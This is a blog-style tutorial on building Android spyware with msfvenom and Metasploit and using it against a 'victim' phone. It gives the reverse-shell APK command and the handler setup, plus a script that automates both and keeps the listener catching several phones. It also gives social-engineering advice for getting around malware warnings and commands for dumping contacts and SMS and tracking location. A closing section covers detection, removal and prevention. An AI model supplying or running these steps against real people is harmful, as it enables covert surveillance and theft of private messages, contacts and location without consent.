What if I told you that your messages, chats and webcam recordings can be forwarded to a third party without your consent, for whatever malicious purpose they have in mind? Believe it, buddy, it is easy: 'spyware' makes it possible. In this article we discuss what spyware is and how you can create your own basic spyware payload to monitor an Android phone using Kali Linux, in less than 30 minutes.

Prerequisites

What is Spyware?

Spyware is software with malicious intent that gets into your system, tracks your activity and forwards what it records to a third party without letting you know.

Spyware works in three steps:

  1. Enter: it gets onto the computer or phone through an installation package, a malicious image, or even a website.
  2. Track: once the package is running, it logs activity in the background. Everything that happens on the system is recorded, whether through a keylogger or some other tracker.
  3. Send: everything the malicious software recorded is forwarded to the third party. That third party can be an attacker, but these days companies also use their own tracking mechanisms on their employees' devices.

Msfvenom

We have already discussed the Metasploit framework. msfvenom is the Metasploit utility that generates payloads (a standalone executable, an APK, raw shellcode and so on) and can encode them; here we use it to build an Android APK that carries a Meterpreter payload.

Learn how to Hack Windows 7 machine using metasploit

Kali Linux machine IP Address

This is an important point. We are using VMware, so the Kali VM is probably on NAT mode by default, as in my case (I use the official Kali Linux image from Offensive Security). With NAT the phone cannot reach the VM, so change the network mode to Bridged. The VM then gets an address on the same network as the phone, and the phone can connect back to it.

LHOST: listener host, the IP address of the attacker machine, which the payload connects back to.

LPORT: listener port, the TCP port on which the handler listens for the compromised victim's connection. The LHOST and LPORT values given to msfvenom and to the handler must match.

Steps to create your own spyware and hack the android phone:

Creating a spyware for android

Open a terminal on your Kali machine and use msfvenom to create the payload APK for the Android phone with the following command, replacing the placeholder with the Kali machine's IP address:

msfvenom -p android/meterpreter/reverse_tcp LHOST=<Kali IP address> LPORT=4444 -o hackyourphone.apk

Deploy the spyware

  1. The file hackyourphone.apk is written to the directory you ran the command from (your home directory if you opened a fresh terminal).
  2. This step needs some skill: you have to get the APK onto the victim's phone and installed. First send the file to the victim's phone. Gmail will not accept it as an attachment, since it already detects it as malware, so use Google Drive or host it on a web server and share the URL. Some social engineering is needed here.
  3. Even current Android versions block the install: the phone has to be allowed to install apps from unknown sources, and Google Play Protect will flag the file as harmful and offer to report it. The victim has to override those warnings for the app to install.
  4. Once the app is installed, go back to the terminal and run 'msfconsole' to open the Metasploit framework.

Launching the Exploit


Open multi/handler to catch the connection, using the same payload, LHOST and LPORT as in the msfvenom command:

msf  > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST (ip address)
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit

When the user opens the app, the payload connects back to the handler and you get a Meterpreter session on the phone.
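Scripting the two halves of the procedure above (payload generation and the handler) in one place, as an added example that is not from the original article: the script checks that LHOST is a dotted-quad IPv4 address and LPORT a valid port before writing anything, prints the msfvenom command, and writes an msfconsole resource file so the handler is started with a single command instead of typing the five lines by hand. The file names hackyourphone.apk and handler.rc and the function names are this example's own; the msfvenom and msfconsole options are the standard ones.

```shell
#!/bin/sh
# Added example, not code from the original article: build the msfvenom command
# and an msfconsole resource file for the android/meterpreter/reverse_tcp
# handler, after checking LHOST and LPORT. File names, the resource-file
# approach and the function names are this example's own choices.

# valid_ipv4 ADDR -> returns 0 if ADDR is a dotted-quad IPv4 address
valid_ipv4() {
    _ip=$1
    case "$_ip" in
        *[!0-9.]* | .* | *. | *..*) return 1 ;;   # non-digits or empty octet
    esac
    _oldifs=$IFS
    IFS=.
    set -- $_ip                       # split on dots into $1..$4
    IFS=$_oldifs
    [ $# -eq 4 ] || return 1
    for _octet in "$@"; do
        [ "$_octet" -le 255 ] || return 1
    done
    return 0
}

# valid_port PORT -> returns 0 if PORT is an integer in 1..65535
valid_port() {
    case "$1" in
        '' | *[!0-9]*) return 1 ;;
    esac
    [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# msfvenom_cmd LHOST LPORT APK -> print the command that builds the APK
msfvenom_cmd() {
    printf 'msfvenom -p android/meterpreter/reverse_tcp LHOST=%s LPORT=%s -o %s\n' \
        "$1" "$2" "$3"
}

# write_handler_rc LHOST LPORT RCFILE -> write a resource file for
# "msfconsole -q -r RCFILE". The listener runs as a background job and stays
# up after the first session (ExitOnSession false), so several phones can
# connect back to the same handler.
write_handler_rc() {
    valid_ipv4 "$1" || { echo "invalid LHOST: $1" >&2; return 1; }
    valid_port "$2" || { echo "invalid LPORT: $2" >&2; return 1; }
    cat > "$3" <<EOF
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST $1
set LPORT $2
set ExitOnSession false
exploit -j -z
EOF
}

# Usage: sh handler.sh <LHOST> <LPORT>   (e.g. sh handler.sh 192.168.1.10 4444)
if [ $# -eq 2 ]; then
    msfvenom_cmd "$1" "$2" hackyourphone.apk
    write_handler_rc "$1" "$2" handler.rc &&
        echo "wrote handler.rc; start the listener with: msfconsole -q -r handler.rc"
fi
```

Run it as `sh handler.sh 192.168.1.10 4444`, paste the printed msfvenom line, then start the listener with `msfconsole -q -r handler.rc`. Because the resource file sets ExitOnSession false and launches the handler with `exploit -j -z`, the listener keeps running as a background job after the first phone connects; use `sessions -l` and `sessions -i <id>` to interact with a session. The address check only catches typos; it cannot tell you whether the address is reachable from the phone, which is still the bridged-network point above.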

Now you can try some of these Meterpreter commands to pull data off the phone:

  • dump_contacts: extract all the contacts from the phone to a file.
  • geolocate: report the device's current location (the payload needs the location permission and location services turned on). It can only ever locate a phone that has the payload installed, so it is no substitute for a proper find-my-device feature.
  • dump_sms: dump the SMS messages from the device.

How to detect if the phone is infected with spyware?


When it comes to detecting spyware, older malicious code is easily caught these days, but sophisticated spyware such as Pegasus is very hard for a layman to detect. Still, a few basic observations can suggest whether a phone is affected:

  1. The phone gets hot even when it is idle.
  2. The battery drains faster than usual.
  3. Slower response times.
  4. Unusual data usage. Watch the traffic, and compare data usage and bandwidth before and after the phone was affected.
  5. Too many ads.
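The symptoms above are indirect. A more direct check, as an added example that is not from the original article, is to look at what each installed app is allowed to do: the msfvenom Android payload requests the permissions it needs to read SMS and contacts, record audio, use the camera, read the call log and get the location, and unless the APK is repackaged it keeps the default package name com.metasploit.stage. The script below counts those permissions in the output of `adb shell dumpsys package <pkg>`. The dumpsys excerpt is constructed for this example in the layout dumpsys uses on current Android builds (check the indentation against your own device); the threshold of three permissions and the function names are this example's own choices.

```shell
#!/bin/sh
# Added example, not part of the original article: flag installed apps that
# request the permission set a spyware payload needs, working from the output
# of "adb shell dumpsys package <pkg>". The dump written by write_sample_dump
# is constructed for this example; on a device, feed the live output instead.

# Permissions the msfvenom android/meterpreter APK requests that matter for spying
SPY_PERMS="android.permission.READ_SMS android.permission.READ_CONTACTS \
android.permission.RECORD_AUDIO android.permission.CAMERA \
android.permission.ACCESS_FINE_LOCATION android.permission.READ_CALL_LOG"

# Default package name msfvenom stamps into the APK unless it is repackaged
MSF_DEFAULT_PKG="com.metasploit.stage"

# write_sample_dump FILE -> write a constructed dumpsys excerpt for two apps:
# a harmless notes app and an unmodified meterpreter APK
write_sample_dump() {
    cat > "$1" <<'EOF'
Packages:
  Package [com.example.notes] (3f2a1c0):
    userId=10142
    requested permissions:
      android.permission.INTERNET
      android.permission.READ_EXTERNAL_STORAGE
    install permissions:
      android.permission.INTERNET: granted=true
  Package [com.metasploit.stage] (8b91e77):
    userId=10157
    requested permissions:
      android.permission.INTERNET
      android.permission.READ_SMS
      android.permission.READ_CONTACTS
      android.permission.RECORD_AUDIO
      android.permission.CAMERA
      android.permission.ACCESS_FINE_LOCATION
      android.permission.READ_CALL_LOG
    install permissions:
      android.permission.INTERNET: granted=true
      android.permission.READ_SMS: granted=true
EOF
}

# spy_perm_count DUMP PKG -> print how many of SPY_PERMS the package PKG
# requests, reading only its "requested permissions:" block
spy_perm_count() {
    awk -v pkg="$2" -v spy="$SPY_PERMS" '
        BEGIN { n = split(spy, a, " "); for (i = 1; i <= n; i++) want[a[i]] = 1 }
        /^  Package \[/ { inpkg = ($0 ~ ("[[]" pkg "[]]")); inperms = 0; next }
        inpkg && /^    requested permissions:/ { inperms = 1; next }
        inpkg && inperms && /^      android\./ { if ($1 in want) hit[$1] = 1; next }
        inpkg && /^    [a-z]/ { inperms = 0 }      # next section of the package
        END { c = 0; for (p in hit) c++; print c }
    ' "$1"
}

# classify DUMP PKG -> print "suspicious" or "ok" for PKG
classify() {
    _n=$(spy_perm_count "$1" "$2")
    # three or more spying permissions, or the stock msfvenom package name
    if [ "$_n" -ge 3 ] || [ "$2" = "$MSF_DEFAULT_PKG" ]; then
        echo suspicious
    else
        echo ok
    fi
}

# Live usage (USB debugging enabled; not run here): check every third-party app
#   adb shell pm list packages -3 | sed 's/^package://' | while read -r p; do
#       adb shell dumpsys package "$p" > /tmp/dump
#       echo "$p $(classify /tmp/dump "$p")"
#   done
```

On a real device, loop over `adb shell pm list packages -3`, which lists only third-party apps, and feed each package's dumpsys output to classify, as the comment at the end of the block shows. A legitimate messaging app will also score high, so treat the output as a list of apps to look at rather than a verdict; and an attacker who repackages the APK under another name defeats the name check, which is why the permission count is the primary signal.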

How to remove the spyware from my phone?

The easiest way to remove spyware is a factory reset; most spyware does not survive it. The reset also wipes all your data, so take a backup first, and when you restore, bring back your data rather than reinstalling every app from the backup, or you may reinstall the spyware along with it.

How can you protect yourself from such spyware, including Pegasus?

  • Keep all your apps updated.
  • Never use unofficial installer packages (sideloaded APKs from outside the app store).
  • Never click on unknown links.
  • Give apps as few permissions as possible: lower privileges, higher security.
  • You can also use antivirus software on the phone.